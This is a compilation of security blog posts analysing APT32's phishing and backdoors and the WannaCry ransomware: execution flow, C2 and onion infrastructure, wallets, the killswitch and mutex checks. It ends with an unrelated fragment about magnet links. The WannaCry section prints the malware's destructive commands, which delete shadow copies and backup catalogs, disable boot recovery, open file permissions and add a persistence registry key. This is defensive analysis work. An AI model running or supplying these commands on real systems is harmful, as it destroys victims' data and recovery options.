When a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.

Once macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32’s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.

To illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure “2017年员工工资性津贴额统计报告.doc”.

Figure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks

In this example, a scheduled task named “Windows Scheduled Maintenance” was created to run Casey Smith’s “Squiblydoo” App Whitelisting bypass every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (“.sct” file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the Safebrowsing malleable C2 profile to further blend in with network traffic. A second scheduled task named “Scheduled Defrags” was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran “mshta.exe” every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.

Figure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.

Figure 5: APT32 Phishing Chain of Events

The impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon’s Invoke-Obfuscation framework.

APT32 regularly used stealthy techniques to blend in with legitimate user activity:

• During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.
• In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.
• APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.

APT32 Malware and Infrastructure

APT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess backdoor development capabilities for macOS.

The capabilities for this unique suite of malware is shown in Table 3.

Malware	Capabilities
WINDSHIELD	Command and control (C2) communications via TCP raw sockets Four configured C2s and six configured ports – randomly-chosen C2/port for communications Registry manipulation Get the current module's file name Gather system information including registry values, user name, computer name, and current code page File system interaction including directory creation, file deletion, reading, and writing files Load additional modules and execute code Terminate processes Anti-disassembly
KOMPROGO	Fully-featured backdoor capable of process, file, and registry management Creating a reverse shell File transfers Running WMI queries Retrieving information about the infected system
SOUNDBITE	C2 communications via DNS Process creation File upload Shell command execution File and directory enumeration/manipulation Window enumeration Registry manipulation System information gathering
PHOREAL	C2 communications via ICMP Reverse shell creation Filesystem manipulation Registry manipulation Process creation File upload
BEACON (Cobalt Strike)	Publicly available payload that can inject and execute arbitrary code into processes Impersonating the security context of users Importing Kerberos tickets Uploading and downloading files Executing shell commands Configured with malleable C2 profiles to blend in with normal network traffic Co-deployment and interoperability with Metasploit framework SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB

Table 3: APT32 Malware and Capabilities

APT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure. The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.

Figure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.

Figure 6: APT32 Attack Lifecycle

Outlook and Implications

Based on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. While the motivation for each APT32 private sector compromise varied – and in some cases was unknown – the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.

While actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.

APT32 Detection

Figure 7 contains a Yara rule can be used to identify malicious macros associated with APT32’s phishing lures:

Figure 7: Yara Rule for APT32 Malicious Macros

Table 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.

C2 Infrastructure
103.53.197.202	104.237.218.70	104.237.218.72
185.157.79.3	193.169.245.78	193.169.245.137
23.227.196.210	24.datatimes.org	80.255.3.87
blog.docksugs.org	blog.panggin.org	contay.deaftone.com
check.paidprefund.org	datatimes.org	docksugs.org
economy.bloghop.org	emp.gapte.name	facebook-cdn.net
gap-facebook.com	gl-appspot.org	help.checkonl.org
high.expbas.net	high.vphelp.net	icon.torrentart.com
images.chinabytes.info	imaps.qki6.com	img.fanspeed.net
job.supperpow.com	lighpress.info	menmin.strezf.com
mobile.pagmobiles.info	news.lighpress.info	notificeva.com
nsquery.net	pagmobiles.info	paidprefund.org
push.relasign.org	relasign.org	share.codehao.net
seri.volveri.net	ssl.zin0.com	static.jg7.org
syn.timeizu.net	teriava.com	timeizu.net
tonholding.com	tulationeva.com	untitled.po9z.com
update-flashs.com	vieweva.com	volveri.net
vphelp.net	yii.yiihao126.net	zone.apize.net

Table 4: Sampling of APT32 C2 Infrastructure

As we discussed Friday when this outbreak began, the WCry or WanaCrypt0r ransomware spread quickly across Europe and Asia, impacting almost 100 countries and disrupting or closing 45 hospitals in the UK. As the ransomware continued to propagate, I got my hands on a sample and quickly began analyzing the malware. This post will walk through my findings and provide a technical overview of the strain of WCry ransomware which caused the massive impact on Friday.  Many have done great work analyzing this malware in action and helping contain its spread, and I hope my comprehensive static analysis will provide a good overall picture of this particular ransomware variant on top of that.

 

The Note

With estimates over 100,000 computers impacted globally thus far, many people received unwelcome notes Friday similar to those below demanding a fee to decrypt their files. Notes like these are unfortunately all too common and typical of today’s ransomware.  While the notes promise to return the data, it’s not guaranteed that paying the ransom will return data safe and sound, but if it gets this far and adequate backups are not in place, it may be the only recourse the victim has.  No one ever wants to see one of these.

Ransom Note

Ransom Note Desktop Background

 

 

Where to Begin?

There has been a lot of discussion about the method of propagation and the overall impact of this ransomware, but what does this ransomware actually do from start to finish?  That is the question I’ll answer in this post.

To begin, we accessed the malware by grabbing it (SHA256 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c/MD5 Db349b97c37d22f5ea1d1841e3c89eb4 ) from VirusTotal. See the appendix  for a  summary of the files dropped with the malware.

Dropper Malware Details

MD5: Db349b97c37d22f5ea1d1841e3c89eb4 

 

Dropped EXE Details

MD5: 84c82835a5d21bbcf75a61706d8ab549

 

The WCry Execution Flow

The WCry ransomware follows a flow similar to that of other ransomware as it damages a machine.  The high level flow is as follows:  It begins with an initial beacon, other researchers have already reported is basically a killswitch function.  If it makes it past that step, then it looks to exploit the ETERNALBLUE/MS17-010 vulnerability and propagate to other hosts.  WCry then goes to work doing damage to the system, first laying the foundations for doing the damage and getting paid for recovery, and once that’s done, WCry starts encrypting files on the system.  See the diagram below for an overview of how this malware works.  I’ll walk through each of these steps in more detail below.  

 

 

As the graphic illustrates, the malware inflicts damage by executing a series of tasks. I’ll walk through each of these tasks, which are numbered below. Each first level of the outline corresponds to that step in the execution flow graphic.

Initial infection and propagation

1. Beacon to hxxp://www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com. Successful connection will cause the malware to quit.  Note that other researchers have reported seeing strains since Friday which have an alternate killswitch URL.  

2. Run the resource Exe as a new service

    a. If Command line args as “-m security”

        1. OpenSCmanager

        2. Create a new service called "Microsoft Security Center (2.0) Service”; “mssecsvc2.0"  as mssecsvc.exe

        3. StartService

        4. Load Resource “tasksche.exe”

        5. Save as C:\\WINDOWS\\tasksche.exe

        6. Move C:\\WINDOWS\\tasksche.exe to C:\\WINDOWS\\qeriuwjhrf

    b. Else Propagate via SMB ETERNAL BLUE / DOUBLE PULSAR Exploit

        1. OpenSCManager

        2. Access service “mssecsvc2.0"

        3. Change Service Config

        4. Start Service Crtl Dispatcher (Run SMB Exploit)

            a. Run thread containing the Payload transfer

Setting up the payload

            b. GetAdaptersInfo to get IPs

            c. New thread to propagate the payload

Payload Delivery

                1. Get TCP Socket for Port 445 (Server Message Block/SMB)
                2. Connect to SMB Socket and get SMB tree_id

                    a. SMB_COM_NEGOTIATE
                    b. Get Tree: ipc_share = "\\\\#{ip}\\IPC$” and SMB_COM_TREE_CONNECT_ANDX
                    c. SMB_COM_TRANSACTION

Example Pseudocode: The screenshot above is from the Metasploit Framework's implementation created after the Shadow Broker's leaks and recent weaponized exploit from RiskSense-Ops.

                3. Run smb ms17-010 Exploit function
                    a. do_smb_ms17_010_probe(tree_id)

                        1. Setup SMB_TRANS_PKT

                    b. If vulnerable, do_smb_doublepulsar_probe(tree_id)
                        1. Prepare Base64 Payload in Memory
                        2. Setup SMBv1 Echo Packet
                        3. make_smb_trans2_doublepulsar

                            a. Setup SMB_TRANS2_PKT (See Appendix)
                        4. if code == 0x51: Successful payload
                    c. Execute Payload Shellcode (See Appendix)

If code == 0x51 - successful payload!!!

 

    c. After Service execution

        1. Gets the computer name
        2. Randomizes string
        3. Get command line args and Checks for switch “/i”

 

Preparation for Ransomware Activity

3. Extract ZIp and Prep Tor and Bitcoin Info:

    a. Extract resource zip file XIA with hardcoded password “WNcry@2ol7”
    b. Get c.wnry, which includes the Tor configuration used by the malware
    c. Extract the configuration from c.wnry to get the Tor browser and onion sites to be used for communication and onion sites to be used for communication:

gx7ekbenv2riucmf.onion;

57g7spgrzlojinas.onion;

xxlvbrloxvriy2c5.onion;

76jdd2ir2embyv47.onion;

cwwnhwhlz52maqm7.onion;

hxxps://dist[.]torproject[.]org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

    d. Load Bitcoin wallets which have been previously set up by the attackers for payment for file restoration and update c.wnry

“13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94”

“12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw"

“115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn"

4. Hide Extract Zip Directory and Modify Security Descriptors

    a. Create process: Runs command to hide current directory: "attrib +h . “
    b. Runs command: icacls . /grant Everyone:F /T /C /Q.  This grants all users full access to files in the current directory and all directories below.

5. Prep Encryption Public Key, AES Key, Decrypt the DLL

    a. Load exports with getprocaddress: CreateFileW, WriteFile, ReadFile, MoveFileW, MoveFileExW, DeleteFileW, CloseHandle
    b. Set up Encryption Keys

        1. SetUp Cypto function exports: CryptGenKey, CryptDecrypt, CryptEncrypt, CryptDestroyKey, CryptImportKey, CryptAcquireContextA
        2. Get RSA_AES Cryptographic Provider
        3. CryptImportKey import the hard coded public key

BOOL WINAPI CryptImportKey(

 _In_  HCRYPTPROV hProv,

 _In_  BYTE *pbData,

 _In_  DWORD dwDataLen, 1172B 2048 bit RSA key (See Appendix)

 _In_  HCRYPTKEY  hPubKey,

 _In_  DWORD dwFlags,

 _Out_ HCRYPTKEY  *phKey

);

        3. Parse t.wnry to get AES key used to decrypt the DLL key used to decrypt the DLL
            a. WANACRY! Length 8
            b. Read Length 100h = Encrypted AES Key
            c. Read 4h = 04 00 00 00
            d. Read 8h DLL Length = 00 00 01 00 00 00 00 00
            e. Decrypt Encrypted AES Key with Public Key
            f. Read encrypted DLL length 1000h
            g. Decrypt DLL with custom AES-128-CBC algorithm with 16B AES Key (See Appendix)
        4. Get Native System Info and GetProcessHeap

        5. Put EncryptedData In Heap Location
        6. Change the protection of that memory location.

 

Encrypted DLL Details

96de5f0587f7201b9f5f16ba2e374f80

Spoofed information the decrypted DLL’s VERSIONINFO resource

 

6. Run DLL Export at function TaskStart

7. Creates Encryption Keys to be used by the user file encryption routine

a. Create Encryption Key by Encrypting the user’’s private key with the ransomware public key and stored in  “%08X.eky” (See Appendix)
b. Also tries to access “%08X.dky” for the received Decryption key

8. Creates Mutex for all threads: Global\\MsWinZonesCacheCounterMutexW

a. Other researchers have noted that if this mutex is present, the malware will not start, offering another way to defend against this malware.

9. Creates a new thread pointing to the setup that starts encrypting files

a. Generates AES Keys to encrypt files using CryptGenKey

 

Encryption routine

10. Creates a new thread to overwrite files on disk

a. Generate a key
b. Generate Data Buffers for each file
c. Call thread for function StartAddress to begin writing encrypting file contents
d. Tack on extension ".WNCRYT”

11. Run new process taskdl.exe in a new thread

12. Set Up the Decrypter Persistence:

a. Read Configuration File
b. Finds the location of @WanaDecryptor@.exe
c. Create process "taskse.exe @WanaDecryptor@.exe”
d. Set persistence key to run itself on reboot HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
e. CheckTokenMembership, GetComputerName Info
f. Run: cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v "<rand>" /t REG_SZ /d “\"tasksche.exe\"" /f
g. Looks for “f.wnry" (what this is for is not clear in my analysis)

 

@WanaDecryptor@.exe Details

MD5: 7bf2b57f2a205768755c07f238fb32cc

 

 

Spoofed information the decrypted DLL’s VERSIONINFO resource 

13. Runs: @WanaDecryptor@.exe fi

a. Reads config file for Tor Client
b. Runs Tor Client.  Note that I did not drill into the communications deeply during this analysis.  It’s basically connecting to the .onion sites listed above to allow for user payment and tracking. 

14. Creates @WanaDecryptor@.exe persistence and backup

a. Creates lnk file @WanaDecryptor@.exe.lnk via batch script

@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut(“@WanaDecryptor@.exe.lnk")>> m.vbs
echo om.TargetPath = "@WanaDecryptor@.exe">> m.vbs
echo om.Save>> m.vbs
cscript.exe  //nologo m.vbs
del m.vbs

b. Write to <randominteger>.bat

1. Execute batch script
2. Delete: del /a %%0

15. Creates Ransom Notes @Please_Read_Me@.txt from “r.wnry"
16. Encrypts files, kills /database and email server-related processes if they are running

a. Capture UserName
b. Get Drive Type
c. Runs:

taskkill.exe /f /im Microsoft.Exchange.*

taskkill.exe /f /im MSExchange*

taskkill.exe /f /im sqlserver.exe

taskkill.exe /f /im sqlwriter.exe

taskkill.exe /f /im mysqld.exe

d. Check Free Disk Space
e. Loops through files and encrypts (see appendix for the targeted extensions) and encrypts (See Appendix for the targeted extensions)

17. Runs: @WanaDecryptor@.exe co

a. Writes to .res file compiled by the time decrypted

b. Writes to .res file compiled by the time decrypted

c. Run Tor service: taskhsvc.exe TaskData\Tor\taskhsvc.exe

18. Runs: cmd.exe /c start /b @WanaDecryptor@.exe vs

a. Deletes the volume shadow copies with the command: Cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete &  bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet with the command: Cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete &  bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

 

Conclusion

Despite its ability to propagate so quickly, the ransomware activities taken by this malware are not particularly interesting or novel.  As I demonstrated in this malware, the killswitch in the execution flow provided a unique opportunity to slow down the ransomware. As security researcher MalwareTech discovered, and Talos described in detail, this malware was programmed to bail out upon a successful connection to that server, which stops the malware altogether.  We should all thank MalwareTech for setting up the sinkhole, which caused this outbreak to slow sooner than it otherwise would have.  

This malware is easy to modify.  As mentioned above, other researchers are already finding variants in the wild.  If you’re running Windows and haven’t patched yet, now’s the time to do it. And while you’re at it, go test your backups to build some confidence that you won’t be forced to choose between paying up or losing data should the worst happen to you or your organization.

 

Appendix

Summary of Files

Zip File (b576ada...31) Contents

 

Extensions to encrypt

.doc,.docx,.docb,.docm,.dot,.dotm,.dotx,.xls,.xlsx,.xlsm,.xlsb,.xlw,.xlt,.xlm,.xlc,.xltx,.xltm,.ppt,.pptx,.pptm,.pot,.pps,.ppsm,.ppsx,.ppam,.potx,.potm,.pst,.ost,.msg,.eml,.edb,.vsd,.vsdx,.txt,.csv,.rtf,.123,.wks,.wk1,.pdf,.dwg,.onetoc2,.snt,.hwp,.602,.sxi,.sti,.sldx,.sldm,.sldm,.vdi,.vmdk,.vmx,.gpg,.aes,.ARC,.PAQ,.bz2,.tbk,.bak,.tar,.tgz,.gz,.7z,.rar,.zip,.backup,.iso,.vcd,.jpeg,.jpg,.bmp,.png,.gif,.raw,.cgm,.tif,.tiff,.nef,.psd,.ai,.svg,.djvu,.m4u,.m3u,.mid,.wma,.flv,.3g2,.mkv,.3gp,.mp4,.mov,.avi,.asf,.mpeg,.vob,.mpg,.wmv,.fla,.swf,.wav,.mp3,.sh,.class,.jar,.java,.rb,.asp,.php,.jsp,.brd,.sch,.dch,.dip,.pl,.vb,.vbs,.ps1,.bat,.cmd,.js,.asm,.h,.pas,.cpp,.c,.cs,.suo,.sln,.ldf,.mdf,.ibd,.myi,.myd,.frm,.odb,.dbf,.db,.mdb,.accdb,.sql,.sqlitedb,.sqlite3,.asc,.lay6,.lay,.mml,.sxm,.otg,.odg,.uop,.std,.sxd,.otp,.odp,.wb2,.slk,.dif,.stc,.sxc,.ots,.ods,.3dm,.max,.3ds,.uot,.stw,.sxw,.ott,.odt,.pem,.p12,.csr,.crt,.key,.pfx,.der 

Public RSA2 Key to Decrypt AES Key (Converted to Base64 for Display)

BwIAAACkAABSU0EyAAgAAAEAAQBDK00rBJwK2Z8e2l/tMqnv4c4aUPQV51F77LAnVgVYtPaDybZ3W4BhGByrFNVq/TtwnRM/LiET8eev4/urbkNxJW0dUtYFXxMnniiJ9sqQkwpoxN6Cm6rCggKxGGABYxu8cY2+ZIhe1Q1swZzJATaJyYA3jx2JZ08MsTxhCToCXbhO9YgKn4wKht+R/s2fo6AT0y0wd9HwqNerluVIljcDaWSXBlwnUIyRdmeFOmxqslkSCmHyoe6oJMjksRFt1sz3j0xesFWEgW1gRYQP/N/5J6VSyVsGKKPedAPWx3Jm3L6kHv8glu1RhADMnDZk8oVNzzZg3ciw8ZHbeguD7s/vGdcS2q6G2fkOvgKvePNbSb4MmK+1X9aKTAVIZJxA4Rz5PMTkQggtsriK5gtt35PMNOhIMJNd340usz015GYwrYvnID3gydlsNkt5uWTNvF4kSNSIkBw9F05lDOz7GyvsXMMG1mw52Gx+I59Ar0BhtPux9oLNoSa4jcg4j5QDTvu77Bde3Ub35/vfJSGtNb2bHbUBP06wILcjNnmBKTze4nbX5h+f6i2lxGqqQDANzP5Y6Ykoy9fknHu5UBenMSE7tJHzhKa9ngPK6c3uTSsp+gIP5yyuML2FzC0TgxJT0/NBTvUj1s5fQc2BfDvwSYG47o01PLrsksfuzyRjAfNK9Nnai+LApKV/2o88UBnswjNaj+57WumDepb9lEtpUJrSNNEJYUWWfdgSXqiuesAmpW/W5WSTAxOjKW0DJPfCielGRnKrVNzYx3UPLRMx522IoT6hLb7/25TRvW3jwlXHyvsrYzEXl0KRkyHdUyUdZMmVZNm1ep+jyuIPGWbkBLVNb10zdhzpIHFLIuBVXpFWVJQ8Njv9/qFi0N/TbpWL4ZbOT3x4OCteXxuMk4BabSNvbfcZiPGMPVIb2Ku01KCIDaz7evrCNcSnqVBiSqyYmzDhWTdRDG0odKwR2XA4LDXTuNnxt0+hNDaLKWE5NQBw3nPl1Ry7XrhgtnBJhXllRnqUgdbMEgWEQ0Bt/HdVjkX4PbmHp4nSWSjOFppT3J2Ck62xPLmmLaqdQ+zifcoyL08tXy5YOHcuKxsK+v55WoDhjSNnQP/T05V6FL6TG/jvN8LuyL9ZPJxdJbZE/2ub6bT9WYW68ToBBfE+Yg1/H+KBl2ZjkCC7lrTPRMd8fn0lLjE1iyoYq9JByTKqS8rvKB2/KpwcNgJrAg+n7RDAoNrPCXJZW8Y8+RV/qiIAcuClXHkGbmI1M4lWq1/x/ZNiToEePfwFaaQvURviyA6mhqK/naScs9yJs+Ow8Ndg1mzeaR7JsAKFltc1hjYWW+YF4fkL7SWA4AoExZZdNGxM8ODHt4qQPJiiepLqUekF7H08yc2qtmaz20jPfftt3QS5G5eevuFYZv3pcKz5/7YjF/3wNQxBOjiaLz8WKuipczB8OMnEfsZopHj+bQAoTjOH5bbJxT3sDpID6xWbOHO/D8F7WolR8Zdx9dXKRJ+H5901bcAfzVuTwQAO8aklyPboi8c=

  

AES Decrypted Key for Decrypting the DLL

BE E1 9B 98 D2 E5 B1 22 11 CE 21 1E EC B1 3D E6

 

Extracting Encrypted AES Key and Encrypted DLL from t.wrny

 

Hard Coded Public Key to Encrypt User Private Key (Converted to Base64 for Display)

BgIAAACkAABSU0ExAAgAAAEAAQB1l0w7hEbeLCr0lahdwM1t2tfUkh4TgjRqcI2PfPcEklV/8aInsp5BrJCAkRiTwrF7rSvz/6/bK1G+HaMn46dXCFq+wR32BPgcvluxZ/vkyNp1AHCxF3AkbAljdKxLCh1xrn+uZbjFhnnFfp+YYExSuSliyyMp7TGRdHt7CyYb8n1nv9p6QNryYU2UpX2tWWutnqM6OcZbbp/Suza19dJl9Sww2MEXva8oAJYgRqctYgMM19B1oAsH6tQfyujZTts48iZ1yxKmiHCb4eoy3PhxclBB5heBaCdCjt/l3qFy2Tv75Z0wEWmSzWAr4tVGPCjPnTBK9625+w+R/i6+GPHO

Dll Decrypt Private Key (Converted to Base64 for Display)

BgIAAACkAABSU0ExAAgAAAEAAQBDK00rBJwK2Z8e2l/tMqnv4c4aUPQV51F77LAnVgVYtPaDybZ3W4BhGByrFNVq/TtwnRM/LiET8eev4/urbkNxJW0dUtYFXxMnniiJ9sqQkwpoxN6Cm6rCggKxGGABYxu8cY2+ZIhe1Q1swZzJATaJyYA3jx2JZ08MsTxhCToCXbhO9YgKn4wKht+R/s2fo6AT0y0wd9HwqNerluVIljcDaWSXBlwnUIyRdmeFOmxqslkSCmHyoe6oJMjksRFt1sz3j0xesFWEgW1gRYQP/N/5J6VSyVsGKKPedAPWx3Jm3L6kHv8glu1RhADMnDZk8oVNzzZg3ciw8ZHbeguD7s/v

Other Files

 

Struct for SMB_TRANS2_PKT

 

Screenshot of Shellcode in SMB1 Trans2 Packet Body

 

As thousands of organizations work to contain and clean up the mess from this week’s devastating Wana ransomware attack, the fraudsters responsible for releasing the digital contagion are no doubt counting their earnings and congratulating themselves on a job well done. But according to a review of the Bitcoin addresses hard-coded into Wana, it appears the perpetrators of what’s being called the worst ransomware outbreak ever have made little more than USD $26,000 so far from the scam.

The Wana ransomware became a global epidemic virtually overnight this week, after criminals started distributing copies of the malware with the help of a security vulnerability in Windows computers that Microsoft patched in March 2017. Infected computers have all their documents and other important user files scrambled with strong encryption, and victims without access to good backups of that data have two choices: Kiss the data goodbye, or pay the ransom — the equivalent of approximately USD $300 worth of the virtual currency Bitcoin.

According to a detailed writeup on the Wana ransomware published Friday by security firm Redsocks, Wana contains three bitcoin payment addresses that are hard-coded into the malware. One of the nice things about Bitcoin is that anyone can view all of the historic transactions tied a given Bitcoin payment address. As a result, it’s possible to tell how much the criminals at the helm of this crimeware spree have made so far and how many victims have paid the ransom.

A review of the three payment addresses hardcoded into the Wana ransomware strain indicates that these accounts to date have received 100 payments totaling slightly more than 15 Bitcoins — or approximately $26,148 at the current Bitcoin-to-dollars exchange rate.

ANALYSIS

It is possible that the crooks responsible for this attack maintained other Bitcoin addresses that were used to receive payments in connection with this attack, but there is currently no evidence of that. It’s worth noting that the ransom note Wana popped up on victim screens (see screenshot above) included a “Contact Us” feature that may have been used by some victims to communicate directly with the fraudsters. Also, I realize that in many ways USD $26,000 is a great deal of money.

However, I find it depressing to think of the massive financial damage likely wrought by this ransom campaign in exchange for such a comparatively small reward. It’s particularly galling because this attack potentially endangered the lives of many. At least 16 hospitals in the United Kingdom were diverting patients and rescheduling procedures on Friday thanks to the Wana outbreak, meaning the attack may well have hurt people physically (no deaths have been reported so far, thank goodness).

Unfortunately, this glaring disparity is par for the course with cybercrime in general. As I observed on several occasions in my book Spam Nation — which tracked the careers of some of the most successful malware writers and pharmacy pill spammers on the planet — it was often disheartening to see how little money most of those guys made given the sheer amount of digital disease they were pumping out into the Internet on a daily basis.

In fact, very few of these individuals made much money at all, and yet they were responsible for perpetuating a global crime machine that inflicted enormous damage on businesses and consumers. A quote in the book from Stefan Savage, a computer science professor at the University of California, San Diego (UCSD) encapsulates the disparity quite nicely and seems to have aged quite well:

“What’s fascinating about all this is that at the end of the day, we’re not talking about all that much money,” Savage said. “These guys running the pharma programs are not Donald Trumps, yet their activity is going to have real and substantial financial impact on the day-to-day lives of tens of millions of people. In other words, for these guys to make modest riches, we need a multibillion-dollar industry to deal with them.”

The WannaCry ransomware worm is unprecedented for two reasons. First, it's a ransomware worm. Second, it appears to be using a recently patched exploit that was stolen from NSA to propagate. Jake Williams' firm, Rendition Infosec, has been tracking the use of this exploit since it was publicly released and completed another internet-wide scan of &hellip; Continue reading WannaCry Ransomware Threat : What we know so far - WEBCAST slides

It looks like #WannaCry’s killswitch check (www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com) is not proxy aware:

Organizations that use proxies will not benefit from the killswitch.

Sample: 5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec

I have not tested this in a VM. If someone has, please post a comment with your findings.

Update: I did test the sample, it is not proxy aware. In an environment with an HTTP proxy and no direct connections to the Internet, the sample can not connect to www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com, and it will infect the host.

If I patch the sample to make it proxy aware, it can connect to the site through the proxy, and it does not infect the host.

---

Quickpost info

---

Update — After reading this article, if you want to know, what has happened so far in past 4 days and how to protect your computers from WannaCry, read our latest article "WannaCry Ransomware: Everything You Need To Know Immediately."  If you are following the news, by now you might be aware that a security researcher has activated a "Kill Switch" which apparently stopped the WannaCry

“If you are following the news, by now you might be aware that a security researcher has activated a ‘Kill Switch’ to stop WannaCry ransomware from spreading further, but it’s not over, criminals have just launched WannaCry 2.0 with no ‘kill-switch’ functionality. “ Source: It’s Not Over, WannaCry 2.0 Ransomware

I’ve seen reports that WannaCry uses a mutex with name Global\MsWinZonesCacheCounterMutexA.

The samples I analyzed all use another mutex: Global\MsWinZonesCacheCounterMutexA0. That’s a digit zero at the end.

I have not found a sample that uses mutex Global\MsWinZonesCacheCounterMutexA (e.g. without digit zero at the end).

Update 1: I got confirmation from Costin Raiu from Kaspersky that the mutex is Global\MsWinZonesCacheCounterMutexA0.

Update 2: dynamic analysis with sample 84c82835a5d21bbcf75a61706d8ab549 shows that there are 2 mutexes that can prevent the ransoming of files: MsWinZonesCacheCounterMutexA and Global\MsWinZonesCacheCounterMutexA0. Remark that the Global namespace must be used with mutex MsWinZonesCacheCounterMutexA0, while it may not be used with mutex MsWinZonesCacheCounterMutexA.

 

Remark that the code above contains string “Global\\MsWinZonesCacheCounterMutexA”, but that is not the actual string used for OpenMutexA.

The actual string used for OpenMutexA is created by a sprintf “%s%d” call, and results in “Global\\MsWinZonesCacheCounterMutexA0“, that is “Global\\MsWinZonesCacheCounterMutexA” with a digit 0 (zero) appended.

Mutexes have long been used by malware authors to prevent more than one instance of the malware running on the same machine. An old anti-malware trick consists in the creation of a specific mutex, to prevent the execution of a specific malware.

I’ve seen tools and scripts published to create mutex Global\MsWinZonesCacheCounterMutexA to prevent WannaCry from infecting machines. This will not work for the samples I analyzed.

Samples I disassembled:

7c465ea7bcccf4f94147add808f24629644be11c0ba4823f16e8c19e0090f0ff (contained as a resource in 5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec).

86721e64ffbd69aa6944b9672bcabb6d (contained as a resource in 5bef35496fcbdbe841c82f4d1ab8b7c2).

Samples I searched for containing the mutex and sprintf code:

509c41ec97bb81b0567b059aa2f50fe8
5bef35496fcbdbe841c82f4d1ab8b7c2
638f9235d038a0a001d5ea7f5c5dc4ae
7f7ccaa16fb15eb1c7399d422f8363e8
84c82835a5d21bbcf75a61706d8ab549
86721e64ffbd69aa6944b9672bcabb6d
d6114ba5f10ad67a4131ab72531f02da
db349b97c37d22f5ea1d1841e3c89eb4
f107a717f76f4f910ae9cb4dc5290594

If you have a sample that actually uses mutex Global\\MsWinZonesCacheCounterMutexA and not mutex Global\\MsWinZonesCacheCounterMutexA0 (e.g. with digit zero appended), please post a comment with the hash of your sample.

 

---

Quickpost info

---

In an excellent post pointing out Wikileaks deserves none of the credit given them in the #MacronLeaks, the author erroneously stated that after Archive.org took down the files, that Wikileaks provided links to a second archive. This is not true. Instead, Wikileaks simply pointed to what's known as "magnet links" of the first archive. Understanding magnet links is critical to understanding all these links and dumps, so I thought I'd describe them.

